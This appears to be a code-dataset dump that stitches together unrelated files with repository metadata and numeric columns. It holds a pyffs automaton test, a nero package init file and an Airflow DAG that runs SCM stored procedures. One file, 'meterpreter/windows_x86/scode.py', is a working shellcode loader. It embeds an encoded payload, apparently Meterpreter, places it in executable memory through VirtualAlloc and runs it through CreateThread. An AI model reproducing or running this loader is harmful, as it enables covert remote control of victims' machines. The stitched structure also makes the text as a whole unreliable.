|
test/automaton_generation/test_universal_automaton_generation.py
|
rominf/pyffs
|
6c805fbfd7771727138b169b32484b53c0b0fad1
|
[
"MIT"
] | 10
|
2016-09-23T20:30:18.000Z
|
2021-03-07T12:56:56.000Z
|
test/automaton_generation/test_universal_automaton_generation.py
|
antoinewdg/pyffs
|
6ac2b6cac67422cbfd34ad0896d6faf35be9ccb9
|
[
"MIT"
] | 3
|
2018-08-21T12:08:36.000Z
|
2020-11-12T19:32:54.000Z
|
from pyffs.core import State
from pyffs.automaton_generation import generate_universal_automaton
def test_generate_automaton_0():
expected = [
[State(-1, 0), State(-1, 0), State(0, 1)],
]
automaton = generate_universal_automaton(0)
assert automaton.matrix == expected
assert automaton.bit_vectors == [(), (0,), (1,)]
assert automaton.max_i_minus_e == [0]
def test_generate_automaton_1():
expected = [
[State(id=1, min_boundary=0),
State(id=2, min_boundary=0),
State(id=0, min_boundary=1),
State(id=2, min_boundary=0),
State(id=4, min_boundary=0),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=2, min_boundary=0),
State(id=2, min_boundary=0),
State(id=4, min_boundary=0),
State(id=4, min_boundary=0),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=2, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=1, min_boundary=2),
State(id=2, min_boundary=2),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1),
State(id=2, min_boundary=1),
State(id=4, min_boundary=1)]
]
automaton = generate_universal_automaton(1)
assert automaton.matrix == expected
assert automaton.max_i_minus_e == [0, -1, 0, 1, 1]
| 34.71
| 67
| 0.570153
| 526
| 3,471
| 3.581749
| 0.053232
| 0.278662
| 0.216561
| 0.297771
| 0.900212
| 0.855096
| 0.816348
| 0.788747
| 0.780255
| 0.780255
| 0
| 0.066325
| 0.270239
| 3,471
| 99
| 68
| 35.060606
| 0.677458
| 0
| 0
| 0.791209
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 1
| 0.021978
| false
| 0
| 0.021978
| 0
| 0.043956
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
5c29b26d3c9dc46bad24f09a2178d64f46afa8cf
| 3,733
|
py
|
Python
|
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
import ctypes
import sys
from ctypes import *
buf=b"\x48\x31\xc9\x48\x81\xe9\xb1\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xf8\x3d\x59\x54\x46\x6d\x59\x99\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x04\x75\xda\xb0\xb6\x85\x95\x99\xf8\x3d\x18\x05\x07\x3d\x0b\xc8\xae\x75\x68\x86\x23\x25\xd2\xcb\x98\x75\xd2\x06\x5e\x25\xd2\xcb\xd8\x75\xd2\x26\x16\x25\x56\x2e\xb2\x77\x14\x65\x8f\x25\x68\x59\x54\x01\x38\x28\x44\x41\x79\xd8\x39\xf4\x54\x15\x47\xac\xbb\x74\xaa\x7c\x08\x1c\xcd\x3f\x79\x12\xba\x01\x11\x55\x96\x0b\xd8\xe1\xe0\x36\x5b\x5b\xc3\x1f\x59\x99\xf8\xb6\xd9\xdc\x46\x6d\x59\xd1\x7d\xfd\x2d\x33\x0e\x6c\x89\xc9\x73\x75\x41\x10\xcd\x2d\x79\xd0\xf9\xed\xba\x02\x0e\x92\x90\xd8\x73\x09\xd1\x1c\x47\xbb\x14\xa8\x31\x75\x68\x94\xea\x2c\x98\x50\xf5\x7c\x58\x95\x7e\x8d\x2c\x68\xb4\x3e\x15\x70\x4e\x28\x60\x48\x8d\xe5\x01\x10\xcd\x2d\x7d\xd0\xf9\xed\x3f\x15\xcd\x61\x11\xdd\x73\x7d\x45\x1d\x47\xbd\x18\x12\xfc\xb5\x11\x55\x96\x2c\x01\xd8\xa0\x63\x00\x0e\x07\x35\x18\xc0\xb9\x67\x11\xd7\xaa\x4d\x18\xcb\x07\xdd\x01\x15\x1f\x37\x11\x12\xea\xd4\x12\xab\xb9\x92\x04\xd0\x46\x4a\x2a\x66\x19\x5e\x6b\x99\xf8\x7c\x0f\x1d\xcf\x8b\x11\x18\x14\x9d\x58\x54\x46\x24\xd0\x7c\xb0\x0c\x99\x04\x16\x24\xe5\x9b\xf8\x1d\xa9\x54\x46\x6d\x59\xd8\xac\x74\xd0\xb0\x0a\xe4\xa8\xd8\x42\x71\x2e\x72\x41\x92\x8c\xd5\x71\xd7\x31\x55\x47\x6d\x59\xc0\xb9\x87\x70\xd4\x2d\x6d\xa6\x4c\x92\x3f\x00\x04\x16\x20\x68\x50\xb5\x0c\x99\x1c\xb9\xad\x11\x10\x3a\x7c\xe3\xbe\x49\xb2\xb9\x66\x2d\x75\xd0\x93\x2c\x7d\x18\xc1\xb4\xb4\xbb\x1c\xcf\x94\x18\x23\x3a\xe6\x6e\x33\xb9\xb8\x11\xa8\x2a\x75\xd0\xad\x07\xd7\xee\x70\xc0\xc2\xa6\x81\x0b\x5c\x99\xd1\xc9\xef\x11\xdd\xbf\x2c\xe3\xed\x14\x06\xb8\xab\x93\x25\xd0\x60\xb0\xb4\x9e\x15\xfc\x18\x37\xd4\x99\xc2\x8c\x1c\xc7\xa9\xe9\x9b\xf8\x3d\x11\xd7\xaa\x7d\x11\x10\x1a\x70\x68\x9d\x2c\x69\x18\xc1\xb0\xb4\xa0\x15\xfc\x6f\x80\x51\xa7\xc2\x8c\x1c\xc5\xa9\x79\xc7\x71\xcb\xd8\xa2\x74\xd6\x41\x2f\xb4\xb0\xc7\x54\x47\x6d\x59\xf3\xb8\x7c\x00\x3c\x46\x7d\x59\x99\xb9\x65\x11\xdd\xb4\x25\x68\x50\xb9\x87\x01\xf0\x15\x88\xa6\x4c\xb0\xb0\xc1\x
54\x47\x6d\x59\xd0\x71\xe2\x0a\x02\x16\x20\x68\x50\xb1\xb4\xa9\x1c\xcf\xb7\x11\x10\x01\x7c\xe3\x56\x9f\xa5\x06\x66\x2d\x75\xda\x90\x66\x25\x58\x5a\xb0\x14\x9f\x21\xa6\x24\xd0\x67\xa7\x64\x18\x0d\x07\x3b\xb1\x89\xf8\x3d\x59\x79\x16\xf6\x59\xa1\xb0\xe2\xd3\xf9\xc5\xba\x57\x09\x5d\xf3\xde\x0a\x0e\x5c\x99\xd0\x71\xc5\xf3\xaa\x86\x18\xa2\xd1\xc9\xe6\x18\x56\x5a\x6d\x11\x10\x3a\xbd\xbb\x5b\x44\x71\x4f\xd8\x72\x29\x59\x15\xc0\x79\x41\xd8\x70\x29\x59\xaa\x86\x18\xba\xd1\xc9\xe6\xa7\x94\x07\x6f\x45\x99\xb9\xb7\x4d\x54\x07\xeb\x4d\x81\xb9\xb5\x4d\x54\x07\x6f\x4d\x81\xb9\xb7\x4d\x44\x07\x5d\x48\xd0\x07\xfc\x11\xab\x8f\x18\x82\xc6\xb9\xc2\xbe\x0c\x2c\x6d\x00\xd0\x3f\xff\xa9\xe1\xe4\x3b\xa6\x4c"
#PAGE_EXECUTE_READWRITEVIRTUAL_MEM
PAGE_EXECUTE_READWRITE = 0x00000040 #
VIRTUAL_MEM = ( 0x1000 | 0x2000 ) #
buf_arr = bytearray (buf) #shellcode
buf_size = len(buf_arr) #shellcode
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") #kernel32.dll
kernel32.VirtualAlloc.restype = ctypes.c_uint64 #c_uint64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) #
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) #shellcode
#print(sc_ptr)
#print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) #dllshellcode
handle = kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(sc_ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
| 138.259259
| 2,691
| 0.728101
| 810
| 3,733
| 3.307407
| 0.304938
| 0.036581
| 0.037327
| 0.024636
| 0.048899
| 0.029115
| 0.028742
| 0.020903
| 0.020903
| 0
| 0
| 0.270394
| 0.060809
| 3,733
| 26
| 2,692
| 143.576923
| 0.493725
| 0.031878
| 0
| 0.15
| 0
| 0.05
| 0.748473
| 0.745142
| 0
| 1
| 0.006108
| 0
| 0
| 1
| 0
| false
| 0
| 0.15
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c345fd079741039dc11bf1c143ba53b127e47ea
| 185
|
py
|
Python
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | 1
|
2021-02-27T07:41:29.000Z
|
2021-02-27T07:41:29.000Z
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | 1
|
2021-01-07T02:49:00.000Z
|
2021-01-09T04:53:30.000Z
|
nero/core/neural_types/__init__.py
|
romesco/NeRo
|
9392b996c92038ed9d99f2a9f86bb1dc17282dd4
|
[
"Apache-2.0"
] | null | null | null |
from nero.core.neural_types.axes import *
from nero.core.neural_types.comparison import *
from nero.core.neural_types.elements import *
from nero.core.neural_types.neural_type import *
| 37
| 48
| 0.827027
| 29
| 185
| 5.103448
| 0.344828
| 0.216216
| 0.324324
| 0.486486
| 0.743243
| 0.587838
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086486
| 185
| 4
| 49
| 46.25
| 0.87574
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
308443da79a8fd622bc9a189b12ce40a0da5a8a7
| 43,282
|
py
|
Python
|
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | null | null | null |
etl_base/etl_base/dags/sqlg_dag_SCM.py
|
buckylee2019/sqlg-airflow
|
37610a23b99bea8d9fdc8b066a01736ff2ff0c9d
|
[
"Apache-2.0"
] | 1
|
2022-03-10T03:47:35.000Z
|
2022-03-10T03:47:35.000Z
|
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import re
import airflow
import pendulum
from datetime import datetime, timedelta
from airflow.operators.sensors import ExternalTaskSensor
from airflow.operators.python_operator import PythonOperator
from airflow.operators.bash_operator import BashOperator
from airflow.contrib.sensors.file_sensor import FileSensor
from airflow import models
from airflow.models import Variable, DagModel, DagBag
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator
# For ODP platform
# from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
# from airflow.operators.oracle_operator import OracleOperator
from acme.operators.sqlg_mssql import MsSqlOperatorWithTemplatedParams
from airflow.operators.mssql_operator import MsSqlOperator
# DB_NAME = 'DWH' # for future xDB operator
# Project-wide DAG start date, pinned to UTC+8 (POSIX "Etc/GMT-8" == UTC+8).
proj_start_date = pendulum.datetime(2021, 1, 1, tzinfo="Etc/GMT-8")
# Directory of the templated SQL files, from the Airflow Variable "sql_path".
tmpl_search_path = Variable.get("sql_path")
# Substring used to recognise ODS-stage flow names.
data_stage_imp_ptn = '_ODS_'
data_stage = []  # re-filled per job flow below by splitting the flow name on '_'
# Ranks each supported schedule preset/cron, more frequent = lower rank
# (standard interval order sequence).
std_interval = {
    '@once' :1,
    '@hourly' :2,
    '0 5 * * *' :3,
    '0 5 * * 0' :4,
    '0 5 1 * *' :5,
    '0 5 1 */3 *' :6,
    '0 5 1 1 *' :7,
}
def sqlg_exec_date_fn(dt, context):
    """Resolve the execution date an ExternalTaskSensor should wait on.

    Sensors waiting on the D_STG_INIT dag with a standard preset schedule
    (interval string starting with '@') use the shared date stored in the
    Airflow Variable "sqlg_execution_date"; every other sensor simply uses
    its own DAG-run execution date.
    """
    var_date = Variable.get("sqlg_execution_date")
    ti = context['ti']
    own_exec_date = context['execution_date']
    schedule_interval = context['dag'].schedule_interval
    waits_on_init = ti.task.external_dag_id == 'D_STG_INIT'
    # Preset schedules ('@once', '@hourly', ...) waiting on INIT sync to the
    # globally planned date; cron schedules keep their own execution date.
    if waits_on_init and schedule_interval[0] == '@':
        exec_date = pendulum.parse(var_date)
    else:
        exec_date = own_exec_date
    print("sqlg_exec_date_fn::DEBUG:external_dag_id, exec_date:", ti.task.external_dag_id, exec_date)
    return exec_date
# Default operator arguments shared by every DAG declared in this file.
args = {
    "owner": "SPA010038",            # owning account shown in the Airflow UI
    'start_date': proj_start_date,
    'provide_context': True          # pass Airflow context to python callables
}
# XSLT:loop: declaration: END}
# XSLT:loop: JOB_FLOW_NAME: START{
# Generated section: one DAG per job flow.  The flow name is split on '_'
# to produce the DAG tags (e.g. "D_ODS_SCM" -> ["D", "ODS", "SCM"]).
# All three SCM DAGs run daily at 05:00 with a 4-hour dagrun timeout and
# at most one active run.
job_flow_name = "D_ODS_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_ODS_SCM = airflow.DAG(
    "D_ODS_SCM",
    tags=tags,
    schedule_interval="0 5 * * *",
    dagrun_timeout=timedelta(minutes=60*4),
    template_searchpath=tmpl_search_path,
    default_args=args,
    # start_date=proj_start_date,
    max_active_runs=1
)
job_flow_name = "D_DM_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_DM_SCM = airflow.DAG(
    "D_DM_SCM",
    tags=tags,
    schedule_interval="0 5 * * *",
    dagrun_timeout=timedelta(minutes=60*4),
    template_searchpath=tmpl_search_path,
    default_args=args,
    # start_date=proj_start_date,
    max_active_runs=1
)
job_flow_name = "D_INT_SCM"
data_stage = job_flow_name.split('_')
tags = data_stage
D_INT_SCM = airflow.DAG(
    "D_INT_SCM",
    tags=tags,
    schedule_interval="0 5 * * *",
    dagrun_timeout=timedelta(minutes=60*4),
    template_searchpath=tmpl_search_path,
    default_args=args,
    # start_date=proj_start_date,
    max_active_runs=1
)
# XSLT:loop: JOB_FLOW_NAME: END}
# JOB_TYPE=ODS-MAIN
def _make_sp_task(task_id, dag):
    """Build the standard stage task: EXECUTE SQLEXT.<task_id>_SP <yyyymmdd>;.

    Every ODS/INT/DM task in this flow runs the identically-named stored
    procedure, passing the DAG execution date rendered in the Asia/Taipei
    timezone as its single argument.

    :param task_id: task id; also the stored-procedure base name.
    :param dag: DAG the task is attached to.
    :return: the configured MsSqlOperatorWithTemplatedParams task.
    """
    return MsSqlOperatorWithTemplatedParams(
        auto_commit=True,
        task_id=task_id,
        pool="sql_pool",
        dag=dag,
        # parameters=({":END_DT_CHAR":"{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"}),
        timeout=60*60*3,  # 3 hours
        sql="EXECUTE SQLEXT." + task_id + "_SP "
            "{{ (execution_date.astimezone('Asia/Taipei')).strftime('%Y%m%d') }}"
            ";",
    )

# D_ODS_SCM stage tasks
my_taskid = "PNL_Revenue_Cost_A"
PNL_Revenue_Cost_A = _make_sp_task(my_taskid, D_ODS_SCM)
my_taskid = "NRE_Summary"
NRE_Summary = _make_sp_task(my_taskid, D_ODS_SCM)
my_taskid = "Daily_Revenue_F"
Daily_Revenue_F = _make_sp_task(my_taskid, D_ODS_SCM)
my_taskid = "RFQ_Master"
RFQ_Master = _make_sp_task(my_taskid, D_ODS_SCM)
my_taskid = "Inventory_A"
Inventory_A = _make_sp_task(my_taskid, D_ODS_SCM)
my_taskid = "DOI_Actual"
DOI_Actual = _make_sp_task(my_taskid, D_ODS_SCM)
# D_DM_SCM stage tasks
my_taskid = "DM_PNL_Revenue_Cost_A"
DM_PNL_Revenue_Cost_A = _make_sp_task(my_taskid, D_DM_SCM)
my_taskid = "DM_NRE_Summary"
DM_NRE_Summary = _make_sp_task(my_taskid, D_DM_SCM)
my_taskid = "DM_Daily_Revenue_F"
DM_Daily_Revenue_F = _make_sp_task(my_taskid, D_DM_SCM)
my_taskid = "DM_RFQ_Master"
DM_RFQ_Master = _make_sp_task(my_taskid, D_DM_SCM)
my_taskid = "DM_Inventory_A"
DM_Inventory_A = _make_sp_task(my_taskid, D_DM_SCM)
my_taskid = "DM_DOI_Actual"
DM_DOI_Actual = _make_sp_task(my_taskid, D_DM_SCM)
# D_INT_SCM stage tasks
my_taskid = "INT_PNL_Revenue_Cost_A"
INT_PNL_Revenue_Cost_A = _make_sp_task(my_taskid, D_INT_SCM)
my_taskid = "INT_NRE_Summary"
INT_NRE_Summary = _make_sp_task(my_taskid, D_INT_SCM)
my_taskid = "INT_Daily_Revenue_F"
INT_Daily_Revenue_F = _make_sp_task(my_taskid, D_INT_SCM)
my_taskid = "INT_RFQ_Master"
INT_RFQ_Master = _make_sp_task(my_taskid, D_INT_SCM)
my_taskid = "INT_Inventory_A"
INT_Inventory_A = _make_sp_task(my_taskid, D_INT_SCM)
my_taskid = "INT_DOI_Actual"
INT_DOI_Actual = _make_sp_task(my_taskid, D_INT_SCM)
# Patch the class attributes so every ExternalTaskSensor instance below
# renders blue-on-white in the Airflow UI, making the cross-DAG wait tasks
# easy to spot in the graph view.
ExternalTaskSensor.ui_color = 'white'
ExternalTaskSensor.ui_fgcolor = 'blue'
# tmpl_search_path = Variable.get("sql_path")
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External:START{{
def branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_SCM,
provide_context=True,
)
my_taskid = "proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_SCM,
)
# Cross dag sensor
my_taskid = "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
D_ODS_SCMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
def branch_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A","D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A","D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A"
D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_PNL_Revenue_Cost_A",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
BRANCH_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A)
def branch_D_DM_SCMxD_INT_SCM__INT_NRE_Summary(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary","D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary","D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_NRE_Summary,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_NRE_Summary"
D_DM_SCMxD_INT_SCM__INT_NRE_Summary= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_NRE_Summary",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
BRANCH_D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary)
def branch_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F","D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F","D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
